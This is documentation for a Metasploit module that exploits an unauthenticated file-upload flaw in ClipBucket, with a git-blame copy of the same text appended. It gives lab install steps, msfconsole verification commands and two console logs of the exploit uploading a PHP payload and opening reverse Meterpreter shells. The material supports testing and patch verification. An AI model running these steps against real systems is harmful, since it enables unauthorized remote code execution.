documentation/modules/exploit/multi/http/clipbucket_fileupload_exec.md

## Vulnerable Application

### Description

A malicious file can be uploaded by an unauthenticated attacker through the `actions/beats_uploader.php` script.
ClipBucket < 4.0.0 - Release 4902 is vulnerable.  Additional information and vulnerabilities can be viewed on
Exploit-DB [44250](https://www.exploit-db.com/exploits/44250/)

Available at [Exploit-DB](https://www.exploit-db.com/apps/60cd1ff56ac93dd35c5e3c4e3537f53c-clipbucket-4881.zip)

### Installation

Download Application: ```wget https://www.exploit-db.com/apps/60cd1ff56ac93dd35c5e3c4e3537f53c-clipbucket-4881.zip```

Unzip: ```unzip 60cd1ff56ac93dd35c5e3c4e3537f53c-clipbucket-4881.zip ```

Move In WebDirectory: ```mv clipbucket-4881/upload/* /var/www/html/```

Change Owner: ```chown -R www-data:www-data /var/www/html/```

Follow Clipbucket Installer Instructions at: ```http://localhost/```


## Verification Steps

  1. Install the application
  2. Start msfconsole
  3. Do: `use exploit/multi/http/clipbucket_fileupload_exec`
  4. Do: `set rport <port>`
  5. Do: `set rhost <ip>`
  6. Do: `set lport <port>`
  7. Do: `set lhost <ip>`
  8. Do: `exploit`
  9. You should get a shell.

## Options

  **TARGETURI**

  TARGETURI by default is `/`,  however it can be changed.

## Scenarios

### ClipBucket on Kali Linux

```
msf > use exploit/multi/http/clipbucket_fileupload_exec 
msf exploit(multi/http/clipbucket_fileupload_exec) > set rhost 10.22.1.4
rhost => 10.22.1.4
msf exploit(multi/http/clipbucket_fileupload_exec) > set rport 80
rport => 80
msf exploit(multi/http/clipbucket_fileupload_exec) > set targeturi clipbucket
targeturi => clipbucket
msf exploit(multi/http/clipbucket_fileupload_exec) > set lhost 10.22.1.4
lhost => 10.22.1.4
msf exploit(multi/http/clipbucket_fileupload_exec) > set lport 5050
lport => 5050
msf exploit(multi/http/clipbucket_fileupload_exec) > run 

[*] Started reverse TCP handler on 10.22.1.4:5050 
[*] Uploading payload..
[+] Looking For Payload .... 
[+] found payload in /actions/CB_BEATS_UPLOAD_DIR/1520842928949a3f.php 
[*] Executing Payload [ clipbucket/actions/CB_BEATS_UPLOAD_DIR/1520842928949a3f.php ]
[*] Sending stage (37543 bytes) to 10.22.1.4
[*] Meterpreter session 1 opened (10.22.1.4:5050 -> 10.22.1.4:41752) at 2018-03-12 13:52:10 +0530
[+] Deleted 1520842928949a3f.php

meterpreter > sysinfo 
Computer    : linux
OS          : Linux linux 4.14.0-kali3-amd64 #1 SMP Debian 4.14.17-1kali1 (2018-02-16) x86_64
Meterpreter : php/linux
meterpreter > 
```
### ClipBucket on Windows 7

```
msf > use exploit/multi/http/clipbucket_fileupload_exec 
msf exploit(multi/http/clipbucket_fileupload_exec) > set rhost 10.22.1.13
rhost => 10.22.1.13
msf exploit(multi/http/clipbucket_fileupload_exec) > set rport 80
rport => 80
msf exploit(multi/http/clipbucket_fileupload_exec) > set TARGETURI clipbucketest
TARGETURI => clipbucketest
msf exploit(multi/http/clipbucket_fileupload_exec) > set lhost 10.22.1.4 
lhost => 10.22.1.4
msf exploit(multi/http/clipbucket_fileupload_exec) > set lport 4545
lport => 4545
msf exploit(multi/http/clipbucket_fileupload_exec) > exploit 

[*] Started reverse TCP handler on 10.22.1.4:4545 
[*] Uploading payload..
[+] Looking For Payload .... 
[+] found payload in /actions/CB_BEATS_UPLOAD_DIR/152084407045df09.php 
[*] Executing Payload [ clipbucketest/actions/CB_BEATS_UPLOAD_DIR/152084407045df09.php ]
[*] Sending stage (37543 bytes) to 10.22.1.13
[*] Meterpreter session 1 opened (10.22.1.4:4545 -> 10.22.1.13:49166) at 2018-03-12 14:11:10 +0530
[+] Deleted 152084407045df09.php

meterpreter > sysinfo 
Computer    : AGENT22-PC
OS          : Windows NT AGENT22-PC 6.1 build 7600 (Windows 7 Ultimate Edition) i586
Meterpreter : php/windows
meterpreter > 
```
fix install lines 2020-03-24 09:36:17 -04:00			`## Vulnerable Application`

			`### Description`
clipbucket_fileupload_exec 2018-03-12 14:17:13 +05:30
documentation update 2018-03-24 19:25:59 -04:00			A malicious file can be uploaded by an unauthenticated attacker through the `actions/beats_uploader.php` script.
			`ClipBucket < 4.0.0 - Release 4902 is vulnerable. Additional information and vulnerabilities can be viewed on`
			`Exploit-DB [44250](https://www.exploit-db.com/exploits/44250/)`
clipbucket_fileupload_exec 2018-03-12 14:17:13 +05:30
documentation update 2018-03-24 19:25:59 -04:00			`Available at [Exploit-DB](https://www.exploit-db.com/apps/60cd1ff56ac93dd35c5e3c4e3537f53c-clipbucket-4881.zip)`
clipbucket_fileupload_exec 2018-03-12 14:17:13 +05:30
fix install lines 2020-03-24 09:36:17 -04:00			`### Installation`
clipbucket_fileupload_exec 2018-03-12 14:17:13 +05:30
documentation update 2018-03-24 19:25:59 -04:00			Download Application: ```wget https://www.exploit-db.com/apps/60cd1ff56ac93dd35c5e3c4e3537f53c-clipbucket-4881.zip```
clipbucket_fileupload_exec 2018-03-12 14:17:13 +05:30
documentation update 2018-03-24 19:25:59 -04:00			Unzip: ```unzip 60cd1ff56ac93dd35c5e3c4e3537f53c-clipbucket-4881.zip ```
clipbucket_fileupload_exec 2018-03-12 14:17:13 +05:30
documentation update 2018-03-24 19:25:59 -04:00			Move In WebDirectory: ```mv clipbucket-4881/upload/* /var/www/html/```

			Change Owner: ```chown -R www-data:www-data /var/www/html/```

			Follow Clipbucket Installer Instructions at: ```http://localhost/```
clipbucket_fileupload_exec 2018-03-12 14:17:13 +05:30

			`## Verification Steps`

			`1. Install the application`
			`2. Start msfconsole`
			3. Do: `use exploit/multi/http/clipbucket_fileupload_exec`
			4. Do: `set rport <port>`
			5. Do: `set rhost <ip>`
documentation update 2018-03-24 19:25:59 -04:00			6. Do: `set lport <port>`
			7. Do: `set lhost <ip>`
			8. Do: `exploit`
			`9. You should get a shell.`
clipbucket_fileupload_exec 2018-03-12 14:17:13 +05:30
			`## Options`

			`TARGETURI`

			TARGETURI by default is `/`, however it can be changed.

			`## Scenarios`
documentation update 2018-03-24 19:25:59 -04:00
			`### ClipBucket on Kali Linux`

clipbucket_fileupload_exec 2018-03-12 14:17:13 +05:30			```
			`msf > use exploit/multi/http/clipbucket_fileupload_exec`
			`msf exploit(multi/http/clipbucket_fileupload_exec) > set rhost 10.22.1.4`
			`rhost => 10.22.1.4`
			`msf exploit(multi/http/clipbucket_fileupload_exec) > set rport 80`
			`rport => 80`
			`msf exploit(multi/http/clipbucket_fileupload_exec) > set targeturi clipbucket`
			`targeturi => clipbucket`
			`msf exploit(multi/http/clipbucket_fileupload_exec) > set lhost 10.22.1.4`
			`lhost => 10.22.1.4`
			`msf exploit(multi/http/clipbucket_fileupload_exec) > set lport 5050`
			`lport => 5050`
			`msf exploit(multi/http/clipbucket_fileupload_exec) > run`

			`[*] Started reverse TCP handler on 10.22.1.4:5050`
			`[*] Uploading payload..`
			`[+] Looking For Payload ....`
			`[+] found payload in /actions/CB_BEATS_UPLOAD_DIR/1520842928949a3f.php`
			`[*] Executing Payload [ clipbucket/actions/CB_BEATS_UPLOAD_DIR/1520842928949a3f.php ]`
			`[*] Sending stage (37543 bytes) to 10.22.1.4`
			`[*] Meterpreter session 1 opened (10.22.1.4:5050 -> 10.22.1.4:41752) at 2018-03-12 13:52:10 +0530`
			`[+] Deleted 1520842928949a3f.php`

			`meterpreter > sysinfo`
			`Computer : linux`
			`OS : Linux linux 4.14.0-kali3-amd64 #1 SMP Debian 4.14.17-1kali1 (2018-02-16) x86_64`
			`Meterpreter : php/linux`
			`meterpreter >`
			```
documentation update 2018-03-24 19:25:59 -04:00			`### ClipBucket on Windows 7`
clipbucket_fileupload_exec 2018-03-12 14:17:13 +05:30
			```
			`msf > use exploit/multi/http/clipbucket_fileupload_exec`
			`msf exploit(multi/http/clipbucket_fileupload_exec) > set rhost 10.22.1.13`
			`rhost => 10.22.1.13`
			`msf exploit(multi/http/clipbucket_fileupload_exec) > set rport 80`
			`rport => 80`
			`msf exploit(multi/http/clipbucket_fileupload_exec) > set TARGETURI clipbucketest`
			`TARGETURI => clipbucketest`
			`msf exploit(multi/http/clipbucket_fileupload_exec) > set lhost 10.22.1.4`
			`lhost => 10.22.1.4`
			`msf exploit(multi/http/clipbucket_fileupload_exec) > set lport 4545`
			`lport => 4545`
			`msf exploit(multi/http/clipbucket_fileupload_exec) > exploit`

			`[*] Started reverse TCP handler on 10.22.1.4:4545`
			`[*] Uploading payload..`
			`[+] Looking For Payload ....`
			`[+] found payload in /actions/CB_BEATS_UPLOAD_DIR/152084407045df09.php`
			`[*] Executing Payload [ clipbucketest/actions/CB_BEATS_UPLOAD_DIR/152084407045df09.php ]`
			`[*] Sending stage (37543 bytes) to 10.22.1.13`
			`[*] Meterpreter session 1 opened (10.22.1.4:4545 -> 10.22.1.13:49166) at 2018-03-12 14:11:10 +0530`
			`[+] Deleted 152084407045df09.php`

			`meterpreter > sysinfo`
			`Computer : AGENT22-PC`
			`OS : Windows NT AGENT22-PC 6.1 build 7600 (Windows 7 Ultimate Edition) i586`
			`Meterpreter : php/windows`
			`meterpreter >`
documentation update 2018-03-24 19:25:59 -04:00			```